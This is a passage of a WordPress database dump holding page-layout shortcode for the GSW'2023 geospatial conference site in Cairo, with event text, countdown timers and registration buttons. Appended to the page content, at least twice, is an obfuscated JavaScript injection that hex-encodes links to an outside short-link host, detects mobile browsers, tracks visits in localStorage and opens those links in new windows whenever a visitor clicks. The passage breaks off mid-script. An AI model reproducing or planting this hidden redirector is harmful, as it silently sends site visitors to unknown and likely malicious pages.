00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:15:10','2022-11-09 16:15:10','',3066,'https://gsw2023.com/?p=3154',0,'revision','',0),
(3155,1,'2022-11-09 16:15:51','2022-11-09 16:15:51','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 